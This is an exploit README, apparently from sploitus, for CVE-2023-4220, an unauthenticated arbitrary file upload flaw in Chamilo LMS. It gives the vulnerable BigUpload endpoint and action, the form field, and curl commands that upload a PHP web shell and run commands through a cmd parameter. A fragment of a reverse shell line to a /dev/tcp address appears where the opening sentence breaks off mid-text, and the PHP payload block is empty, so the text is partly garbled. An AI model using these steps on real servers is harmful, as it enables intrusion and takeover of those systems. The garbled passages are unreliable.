Share
## https://sploitus.com/exploit?id=00F0A6F0-DE0C-5E3C-9F8C-88889E34121D
# ChamiloLMS CVE-2023-4220 Exploit

Python exploit for **CVE-2023-4220**, an unauthenticated arbitrary file upload vulnerability affecting **Chamilo LMS & /dev/tcp/10.10.14.3/4444 0>&1'
```

Make sure the `LHOST` value is reachable from the target. In VPN environments, this is usually your tunnel interface address:

```bash
ip -brief addr show tun0
```

---

## Vulnerability Details

**CVE-2023-4220** affects Chamilo LMS versions up to and including **1.11.24**.

The vulnerable upload handler is located at:

```text
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
```

The action abused by the exploit is:

```text
?action=post-unsupported
```

Uploaded files are commonly accessible from:

```text
/main/inc/lib/javascript/bigupload/files/
```

The exploit sends a `multipart/form-data` POST request using the form field expected by BigUpload:

```text
bigUploadFile
```

The uploaded PHP payload is a small command wrapper:

```php

```

Commands are passed through the `cmd` GET parameter:

```text
http://target.com/main/inc/lib/javascript/bigupload/files/shell.php?cmd=id
```

The markers around the command output are used to extract the relevant part of the HTTP response.

---

## Manual Request

The upload performed by the scripts is equivalent to:

```bash
curl -i -s -X POST \
  -F 'bigUploadFile=@shell.php;filename=shell.php' \
  'http://target.com/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
```

After a successful upload, command execution can be tested with:

```bash
curl 'http://target.com/main/inc/lib/javascript/bigupload/files/shell.php?cmd=id'
```

---

## Notes

`--check` only verifies whether the expected BigUpload files directory is reachable. A positive result does not guarantee that the target is exploitable.

A full validation requires uploading the PHP payload and confirming command execution with `--upload` or `--cmd`.

If the upload works but command execution fails, PHP execution may be disabled in the upload directory, the target may be patched, or a server-side rule may be blocking the request.

Use `--cleanup` if you want the script to try removing the uploaded PHP file after execution.